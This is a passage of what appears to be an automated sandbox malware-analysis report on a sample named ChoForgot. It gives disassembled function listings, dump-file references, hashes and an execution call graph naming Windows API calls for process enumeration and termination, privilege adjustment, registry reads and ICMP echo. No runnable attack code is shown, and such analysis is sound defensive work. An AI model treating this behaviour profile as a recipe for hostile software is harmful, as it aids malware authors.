                                                                                                                                                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                        Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                        Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:3.4%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                        Signature Coverage:3.6%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:49
                                                                                                                                                                                                                                                                                                        execution_graph 104680 fb105b 104685 fb52a7 104680->104685 104682 fb106a 104716 fd0413 29 API calls __onexit 104682->104716 104684 fb1074 104686 fb52b7 __wsopen_s 104685->104686 104687 fbbf73 8 API calls 104686->104687 104688 fb536d 104687->104688 104689 fb5594 10 API calls 104688->104689 104690 fb5376 104689->104690 104717 fb5238 104690->104717 104693 fb6b7c 8 API calls 104694 fb538f 104693->104694 104695 fb6a7c 8 API calls 104694->104695 104696 fb539e 104695->104696 104697 fbbf73 8 API calls 104696->104697 104698 fb53a7 104697->104698 104699 fbbd57 8 API calls 104698->104699 104700 fb53b0 RegOpenKeyExW 104699->104700 104701 ff4be6 RegQueryValueExW 104700->104701 104705 fb53d2 104700->104705 104702 ff4c7c RegCloseKey 104701->104702 104703 ff4c03 104701->104703 104702->104705 104713 ff4c8e _wcslen 104702->104713 104704 fd017b 8 API calls 104703->104704 104706 ff4c1c 104704->104706 104705->104682 104707 fb423c 8 API calls 104706->104707 104708 ff4c27 RegQueryValueExW 104707->104708 104709 ff4c44 104708->104709 104712 ff4c5e messages 104708->104712 104710 fb8577 8 API calls 104709->104710 104710->104712 104711 fb655e 8 API calls 104711->104713 104712->104702 104713->104705 104713->104711 104714 fbb329 8 API calls 104713->104714 104715 fb6a7c 8 API calls 104713->104715 104714->104713 104715->104713 104716->104684 104718 ff22d0 __wsopen_s 104717->104718 104719 fb5245 GetFullPathNameW 104718->104719 104720 fb5267 104719->104720 104721 fb8577 8 API calls 104720->104721 104722 fb5285 104721->104722 104722->104693 104723 fc235c 104724 fc2365 __fread_nolock 104723->104724 104725 fb8ec0 52 API calls 104724->104725 104726 10074e3 104724->104726 104727 fc1ff7 __fread_nolock 104724->104727 104730 fc23b6 104724->104730 104731 fd014b 8 API calls 104724->104731 104734 fd017b 8 API calls 104724->104734 104725->104724 104735 10113c8 8 API calls __fread_nolock 104726->104735 104729 10074ef 104729->104727 104733 fbbed9 8 API calls 104729->104733 104732 fb7d74 8 API calls 104730->104732 104731->104724 104732->104727 104733->104727 104734->104724 104735->104729 102000 fc0ebf 102001 fc0ed3 102000->102001 102007 fc1425 102000->102007 102002 fc0ee5 102001->102002 102167 fd014b 102001->102167 102003 100562c 102002->102003 102006 fc0f3e 102002->102006 102176 fbb4c8 8 API calls 102002->102176 102181 1021b14 8 API calls 102003->102181 102025 fc049d messages 102006->102025 102105 fc2b20 102006->102105 102007->102002 102177 fbbed9 102007->102177 102011 100632b 102185 1023fe1 81 API calls __wsopen_s 102011->102185 102012 fc1695 102020 fbbed9 8 API calls 102012->102020 102012->102025 102015 fd014b 8 API calls 102031 fc0376 messages 102015->102031 102016 100625a 102184 1023fe1 81 API calls __wsopen_s 102016->102184 102017 1005cdb 102023 fbbed9 8 API calls 102017->102023 102017->102025 102020->102025 102021 fbbed9 8 API calls 102021->102031 102023->102025 102024 fbbf73 8 API calls 102024->102031 102026 fd0413 29 API calls pre_c_initialization 102026->102031 102027 fd05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102027->102031 102028 1006115 102182 1023fe1 81 API calls __wsopen_s 102028->102182 102029 fc0aae messages 102183 1023fe1 81 API calls __wsopen_s 102029->102183 102031->102011 102031->102012 102031->102015 102031->102016 102031->102017 102031->102021 102031->102024 102031->102025 102031->102026 102031->102027 102031->102028 102031->102029 102032 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102031->102032 102033 fc1990 102031->102033 102095 fc1e50 102031->102095 102032->102031 102034 fc1a2e 102033->102034 102035 fc19b6 102033->102035 102036 1006a4d 102034->102036 102052 fc1a3d 102034->102052 102037 1006b60 102035->102037 102038 fc19c3 102035->102038 102040 1006b54 102036->102040 102041 1006a58 102036->102041 102215 10385db 224 API calls 2 library calls 102037->102215 102046 1006b84 102038->102046 102047 fc19cd 102038->102047 102214 1023fe1 81 API calls __wsopen_s 102040->102214 102213 fcb35c 224 API calls 102041->102213 102045 1006bb5 102048 1006bc0 102045->102048 102049 1006be2 102045->102049 102046->102045 102050 1006b9c 102046->102050 102056 fbbed9 8 API calls 102047->102056 102094 fc19e0 messages 102047->102094 102217 10385db 224 API calls 2 library calls 102048->102217 102218 10360e6 102049->102218 102216 1023fe1 81 API calls __wsopen_s 102050->102216 102051 1006979 102212 1023fe1 81 API calls __wsopen_s 102051->102212 102052->102051 102055 fc1bb5 102052->102055 102061 1006908 102052->102061 102070 fc1ba9 102052->102070 102077 fc1af4 102052->102077 102052->102094 102186 fc0340 102052->102186 102055->102031 102056->102094 102059 1006dd9 102065 1006e0f 102059->102065 102256 10381ce 65 API calls 102059->102256 102211 1023fe1 81 API calls __wsopen_s 102061->102211 102063 1006c81 102229 1021ad8 8 API calls 102063->102229 102258 fbb4c8 8 API calls 102065->102258 102066 1006db7 102232 fb8ec0 102066->102232 102069 fbbed9 8 API calls 102069->102094 102070->102055 102210 1023fe1 81 API calls __wsopen_s 102070->102210 102072 1006ded 102075 fb8ec0 52 API calls 102072->102075 102074 1006c08 102225 102148b 102074->102225 102089 1006df5 _wcslen 102075->102089 102077->102070 102209 fc1ca0 8 API calls 102077->102209 102079 1006c93 102230 fbbd07 8 API calls 102079->102230 102080 100691d messages 102080->102051 102090 fc1b62 messages 102080->102090 102092 fc1a23 messages 102080->102092 102082 fc1b55 102082->102070 102082->102090 102084 1006dbf _wcslen 102084->102059 102255 fbb4c8 8 API calls 102084->102255 102086 1006c9c 102093 102148b 8 API calls 102086->102093 102088 fc2b20 224 API calls 102088->102094 102089->102065 102257 fbb4c8 8 API calls 102089->102257 102090->102069 102090->102092 102090->102094 102092->102031 102093->102094 102094->102059 102094->102092 102231 103808f 53 API calls __wsopen_s 102094->102231 102096 fc1e6d messages 102095->102096 102097 fc1ff7 messages 102096->102097 102098 fc2512 102096->102098 102101 1007837 102096->102101 102104 100766b 102096->102104 102287 fce322 8 API calls messages 102096->102287 102097->102031 102098->102097 102289 fcbe08 39 API calls 102098->102289 102101->102097 102288 fdd2d5 39 API calls 102101->102288 102286 fdd2d5 39 API calls 102104->102286 102106 fc2b86 102105->102106 102107 fc2fc0 102105->102107 102109 1007bd8 102106->102109 102110 fc2ba0 102106->102110 102465 fd05b2 5 API calls __Init_thread_wait 102107->102465 102428 1037af9 102109->102428 102290 fc3160 102110->102290 102113 1007be4 102113->102031 102114 fc2fca 102116 fbb329 8 API calls 102114->102116 102118 fc300b 102114->102118 102125 fc2fe4 102116->102125 102117 fc3160 9 API calls 102119 fc2bc6 102117->102119 102120 1007bed 102118->102120 102467 fbb4c8 8 API calls 102118->102467 102119->102118 102121 fc2bfc 102119->102121 102120->102031 102122 1007bfd 102121->102122 102146 fc2c18 __fread_nolock 102121->102146 102470 1023fe1 81 API calls __wsopen_s 102122->102470 102466 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102125->102466 102126 fc3049 102468 fce6e8 224 API calls 102126->102468 102128 1007c15 102471 1023fe1 81 API calls __wsopen_s 102128->102471 102131 fc2d3f 102132 fc2d4c 102131->102132 102133 1007c78 102131->102133 102135 fc3160 9 API calls 102132->102135 102473 10361a2 53 API calls _wcslen 102133->102473 102137 fc2d59 102135->102137 102136 fd014b 8 API calls 102136->102146 102142 fc3160 9 API calls 102137->102142 102152 fc2dd7 messages 102137->102152 102138 fc3082 102469 fcfe39 8 API calls 102138->102469 102139 fd017b 8 API calls 102139->102146 102141 fc2f2d 102141->102031 102148 fc2d73 102142->102148 102144 fc0340 224 API calls 102144->102146 102145 fc2e8b messages 102145->102141 102464 fce322 8 API calls messages 102145->102464 102146->102126 102146->102128 102146->102131 102146->102136 102146->102139 102146->102144 102149 1007c59 102146->102149 102146->102152 102148->102152 102153 fbbed9 8 API calls 102148->102153 102472 1023fe1 81 API calls __wsopen_s 102149->102472 102150 fc3160 9 API calls 102150->102152 102152->102138 102152->102145 102152->102150 102300 103a9ac 102152->102300 102308 103a6aa 102152->102308 102316 103ab3f 102152->102316 102338 1030fb8 102152->102338 102363 102f94a 102152->102363 102372 1039ffc 102152->102372 102375 fbbd57 102152->102375 102381 1039fe8 102152->102381 102384 102664c 102152->102384 102391 fcf950 102152->102391 102398 103ad47 102152->102398 102403 103a5b2 102152->102403 102409 fcac3e 102152->102409 102474 1023fe1 81 API calls __wsopen_s 102152->102474 102153->102152 102169 fd0150 ___std_exception_copy 102167->102169 102168 fd016a 102168->102002 102169->102168 102172 fd016c 102169->102172 102992 fd521d 7 API calls 2 library calls 102169->102992 102171 fd09dd 102994 fd3614 RaiseException 102171->102994 102172->102171 102993 fd3614 RaiseException 102172->102993 102175 fd09fa 102175->102002 102176->102002 102178 fbbefc __fread_nolock 102177->102178 102179 fbbeed 102177->102179 102178->102002 102179->102178 102180 fd017b 8 API calls 102179->102180 102180->102178 102181->102025 102182->102029 102183->102025 102184->102025 102185->102025 102205 fc0376 messages 102186->102205 102187 fd05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 102187->102205 102188 fd0413 29 API calls pre_c_initialization 102188->102205 102189 fd014b 8 API calls 102189->102205 102190 100632b 102262 1023fe1 81 API calls __wsopen_s 102190->102262 102191 fc1695 102199 fbbed9 8 API calls 102191->102199 102203 fc049d messages 102191->102203 102192 fc1e50 40 API calls 102192->102205 102194 100625a 102261 1023fe1 81 API calls __wsopen_s 102194->102261 102195 fbbed9 8 API calls 102195->102205 102196 1005cdb 102201 fbbed9 8 API calls 102196->102201 102196->102203 102199->102203 102200 fc1990 224 API calls 102200->102205 102201->102203 102202 fbbf73 8 API calls 102202->102205 102203->102052 102204 fc0aae messages 102260 1023fe1 81 API calls __wsopen_s 102204->102260 102205->102187 102205->102188 102205->102189 102205->102190 102205->102191 102205->102192 102205->102194 102205->102195 102205->102196 102205->102200 102205->102202 102205->102203 102205->102204 102206 1006115 102205->102206 102207 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 102205->102207 102259 1023fe1 81 API calls __wsopen_s 102206->102259 102207->102205 102209->102082 102210->102092 102211->102080 102212->102094 102213->102090 102214->102037 102215->102094 102216->102092 102217->102094 102219 1006bed 102218->102219 102220 1036101 102218->102220 102219->102063 102219->102074 102263 fd017b 102220->102263 102222 fd014b 8 API calls 102223 1036123 102222->102223 102223->102219 102223->102222 102272 1021400 8 API calls 102223->102272 102226 1006c32 102225->102226 102227 1021499 102225->102227 102226->102088 102227->102226 102228 fd014b 8 API calls 102227->102228 102228->102226 102229->102079 102230->102086 102231->102066 102233 fb8ed2 102232->102233 102234 fb8ed5 102232->102234 102233->102084 102235 fb8f0b 102234->102235 102236 fb8edd 102234->102236 102238 ff6b1f 102235->102238 102239 fb8f1d 102235->102239 102246 ff6a38 102235->102246 102276 fd5536 26 API calls 102236->102276 102285 fd54f3 26 API calls 102238->102285 102283 fcfe6f 51 API calls 102239->102283 102240 fb8eed 102245 fd014b 8 API calls 102240->102245 102243 ff6b37 102243->102243 102247 fb8ef7 102245->102247 102248 ff6ab1 102246->102248 102250 fd017b 8 API calls 102246->102250 102277 fbb329 102247->102277 102284 fcfe6f 51 API calls 102248->102284 102252 ff6a81 102250->102252 102251 fd014b 8 API calls 102253 ff6aa8 102251->102253 102252->102251 102254 fbb329 8 API calls 102253->102254 102254->102248 102255->102059 102256->102072 102257->102065 102258->102092 102259->102204 102260->102203 102261->102203 102262->102203 102264 fd014b ___std_exception_copy 102263->102264 102265 fd016a 102264->102265 102268 fd016c 102264->102268 102273 fd521d 7 API calls 2 library calls 102264->102273 102265->102223 102267 fd09dd 102275 fd3614 RaiseException 102267->102275 102268->102267 102274 fd3614 RaiseException 102268->102274 102271 fd09fa 102271->102223 102272->102223 102273->102264 102274->102267 102275->102271 102276->102240 102278 fbb338 _wcslen 102277->102278 102279 fd017b 8 API calls 102278->102279 102280 fbb360 __fread_nolock 102279->102280 102281 fd014b 8 API calls 102280->102281 102282 fbb376 102281->102282 102282->102233 102283->102240 102284->102238 102285->102243 102286->102104 102287->102096 102288->102097 102289->102097 102291 fc31a1 102290->102291 102292 fc317d 102290->102292 102475 fd05b2 5 API calls __Init_thread_wait 102291->102475 102293 fc2bb0 102292->102293 102477 fd05b2 5 API calls __Init_thread_wait 102292->102477 102293->102117 102296 fc31ab 102296->102292 102476 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102296->102476 102297 fc9f47 102297->102293 102478 fd0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 102297->102478 102301 103aa08 102300->102301 102307 103a9c8 102300->102307 102302 103aa26 102301->102302 102511 fbc98d 102301->102511 102304 fbc98d 39 API calls 102302->102304 102305 103aa8e 102302->102305 102302->102307 102304->102305 102479 1020372 102305->102479 102307->102152 102310 103a705 102308->102310 102315 103a6c5 102308->102315 102309 103a723 102311 fbc98d 39 API calls 102309->102311 102313 103a780 102309->102313 102309->102315 102310->102309 102312 fbc98d 39 API calls 102310->102312 102311->102313 102312->102309 102314 1020372 58 API calls 102313->102314 102314->102315 102315->102152 102317 fb8ec0 52 API calls 102316->102317 102318 103ab62 102317->102318 102556 101dd87 CreateToolhelp32Snapshot Process32FirstW 102318->102556 102320 103ab73 102321 103abc3 OpenProcess 102320->102321 102327 103ab78 102320->102327 102322 103acc2 TerminateProcess 102321->102322 102323 103abdd GetLastError 102321->102323 102324 103ad20 CloseHandle 102322->102324 102325 103accf GetLastError 102322->102325 102326 103abec 102323->102326 102332 103ac72 102323->102332 102324->102327 102333 103ace3 102325->102333 102566 101d715 12 API calls 102326->102566 102327->102152 102329 103abfa 102567 1012010 11 API calls messages 102329->102567 102331 103ac04 102334 103ac08 OpenProcess 102331->102334 102335 103ac1a 102331->102335 102332->102322 102332->102327 102333->102324 102334->102335 102568 1011a0b AdjustTokenPrivileges CloseHandle messages 102335->102568 102337 103ac70 102337->102332 102339 1030fe1 102338->102339 102340 103100f WSAStartup 102339->102340 102342 fbc98d 39 API calls 102339->102342 102341 1031054 102340->102341 102362 1031023 messages 102340->102362 102690 fcc1f6 102341->102690 102344 1030ffc 102342->102344 102344->102340 102347 fbc98d 39 API calls 102344->102347 102346 fb8ec0 52 API calls 102348 1031069 102346->102348 102349 103100b 102347->102349 102695 fcf9d4 WideCharToMultiByte 102348->102695 102349->102340 102351 1031075 inet_addr gethostbyname 102352 1031093 IcmpCreateFile 102351->102352 102351->102362 102353 10310d3 102352->102353 102352->102362 102354 fd017b 8 API calls 102353->102354 102355 10310ec 102354->102355 102703 fb423c 102355->102703 102358 1031102 IcmpSendEcho 102361 103114c 102358->102361 102359 103112b IcmpSendEcho 102359->102361 102360 1031212 IcmpCloseHandle WSACleanup 102360->102362 102361->102360 102362->102152 102364 fd017b 8 API calls 102363->102364 102365 102f95b 102364->102365 102366 fb423c 8 API calls 102365->102366 102367 102f965 102366->102367 102368 fb8ec0 52 API calls 102367->102368 102369 102f97c GetEnvironmentVariableW 102368->102369 102708 102160f 8 API calls 102369->102708 102371 102f999 messages 102371->102152 102709 10389b6 102372->102709 102374 103a00c 102374->102152 102376 fbbd71 102375->102376 102377 fbbd64 102375->102377 102378 fd014b 8 API calls 102376->102378 102377->102152 102379 fbbd7b 102378->102379 102380 fd017b 8 API calls 102379->102380 102380->102377 102382 10389b6 119 API calls 102381->102382 102383 1039ff8 102382->102383 102383->102152 102385 fb8ec0 52 API calls 102384->102385 102386 1026662 102385->102386 102822 101dc54 102386->102822 102388 102666a 102389 102666e GetLastError 102388->102389 102390 1026683 102388->102390 102389->102390 102390->102152 102392 fbc98d 39 API calls 102391->102392 102393 fcf964 102392->102393 102394 100fb20 Sleep 102393->102394 102395 fcf96c timeGetTime 102393->102395 102396 fbc98d 39 API calls 102395->102396 102397 fcf982 102396->102397 102397->102152 102399 fb8ec0 52 API calls 102398->102399 102400 103ad63 102399->102400 102401 101dd87 46 API calls 102400->102401 102402 103ad72 102401->102402 102402->102152 102405 103a5c5 102403->102405 102404 fb8ec0 52 API calls 102406 103a632 102404->102406 102405->102404 102408 103a5d4 102405->102408 102883 10218a9 102406->102883 102408->102152 102410 fb8ec0 52 API calls 102409->102410 102411 fcac68 102410->102411 102924 fcbc58 102411->102924 102413 fcac7f 102414 fbc98d 39 API calls 102413->102414 102416 fcb09b _wcslen 102413->102416 102414->102416 102415 fd4d98 _strftime 40 API calls 102415->102416 102416->102415 102417 fcbbbe 43 API calls 102416->102417 102419 fb6c03 8 API calls 102416->102419 102422 fcb1fb 102416->102422 102423 fb8ec0 52 API calls 102416->102423 102424 fbc98d 39 API calls 102416->102424 102425 fb8577 8 API calls 102416->102425 102929 fb396b 102416->102929 102939 fb3907 102416->102939 102943 fb7ad5 102416->102943 102948 fbad40 8 API calls __fread_nolock 102416->102948 102949 fb7b1a 8 API calls 102416->102949 102417->102416 102419->102416 102422->102152 102423->102416 102424->102416 102425->102416 102429 1037b52 102428->102429 102430 1037b38 102428->102430 102432 10360e6 8 API calls 102429->102432 102987 1023fe1 81 API calls __wsopen_s 102430->102987 102433 1037b5d 102432->102433 102434 fc0340 223 API calls 102433->102434 102435 1037bc1 102434->102435 102436 1037c5c 102435->102436 102440 1037c03 102435->102440 102463 1037b4a 102435->102463 102437 1037c62 102436->102437 102438 1037cb0 102436->102438 102988 1021ad8 8 API calls 102437->102988 102439 fb8ec0 52 API calls 102438->102439 102438->102463 102441 1037cc2 102439->102441 102445 102148b 8 API calls 102440->102445 102443 fbc2c9 8 API calls 102441->102443 102446 1037ce6 CharUpperBuffW 102443->102446 102444 1037c85 102989 fbbd07 8 API calls 102444->102989 102448 1037c3b 102445->102448 102450 1037d00 102446->102450 102449 fc2b20 223 API calls 102448->102449 102449->102463 102451 1037d53 102450->102451 102452 1037d07 102450->102452 102453 fb8ec0 52 API calls 102451->102453 102456 102148b 8 API calls 102452->102456 102454 1037d5b 102453->102454 102990 fcaa65 9 API calls 102454->102990 102457 1037d35 102456->102457 102458 fc2b20 223 API calls 102457->102458 102458->102463 102459 1037d65 102460 fb8ec0 52 API calls 102459->102460 102459->102463 102461 1037d80 102460->102461 102991 fbbd07 8 API calls 102461->102991 102463->102113 102464->102145 102465->102114 102466->102118 102467->102126 102468->102138 102469->102138 102470->102152 102471->102152 102472->102152 102473->102148 102474->102152 102475->102296 102476->102292 102477->102297 102478->102293 102516 10202aa 102479->102516 102482 10203f3 102532 10205e9 56 API calls __fread_nolock 102482->102532 102483 102040b 102484 1020471 102483->102484 102486 102041b 102483->102486 102487 10204a1 102484->102487 102488 1020507 102484->102488 102499 1020399 __fread_nolock 102484->102499 102510 1020453 102486->102510 102533 1022855 10 API calls 102486->102533 102489 10204d1 102487->102489 102490 10204a6 102487->102490 102491 10205b0 102488->102491 102492 1020510 102488->102492 102489->102499 102537 fbca5b 39 API calls 102489->102537 102490->102499 102536 fbca5b 39 API calls 102490->102536 102491->102499 102541 fbc63f 39 API calls 102491->102541 102493 1020515 102492->102493 102497 102058d 102492->102497 102500 102051b 102493->102500 102501 1020554 102493->102501 102497->102499 102540 fbc63f 39 API calls 102497->102540 102499->102307 102500->102499 102538 fbc63f 39 API calls 102500->102538 102501->102499 102539 fbc63f 39 API calls 102501->102539 102506 1020427 102534 1022855 10 API calls 102506->102534 102508 102043e __fread_nolock 102535 1022855 10 API calls 102508->102535 102523 1021844 102510->102523 102512 fbc99e 102511->102512 102513 fbc9a5 102511->102513 102512->102513 102555 fd6641 39 API calls _strftime 102512->102555 102513->102302 102515 fbc9e8 102515->102302 102517 10202f7 102516->102517 102521 10202bb 102516->102521 102518 fbc98d 39 API calls 102517->102518 102519 10202f5 102518->102519 102519->102482 102519->102483 102519->102499 102520 fb8ec0 52 API calls 102520->102521 102521->102519 102521->102520 102542 fd4d98 102521->102542 102524 102184f 102523->102524 102525 fd014b 8 API calls 102524->102525 102526 1021856 102525->102526 102527 1021862 102526->102527 102528 1021883 102526->102528 102529 fd017b 8 API calls 102527->102529 102530 fd017b 8 API calls 102528->102530 102531 102186b ___scrt_fastfail 102529->102531 102530->102531 102531->102499 102532->102499 102533->102506 102534->102508 102535->102510 102536->102499 102537->102499 102538->102499 102539->102499 102540->102499 102541->102499 102543 fd4e1b 102542->102543 102544 fd4da6 102542->102544 102554 fd4e2d 40 API calls 4 library calls 102543->102554 102551 fd4dcb 102544->102551 102552 fdf649 20 API calls __dosmaperr 102544->102552 102547 fd4e28 102547->102521 102548 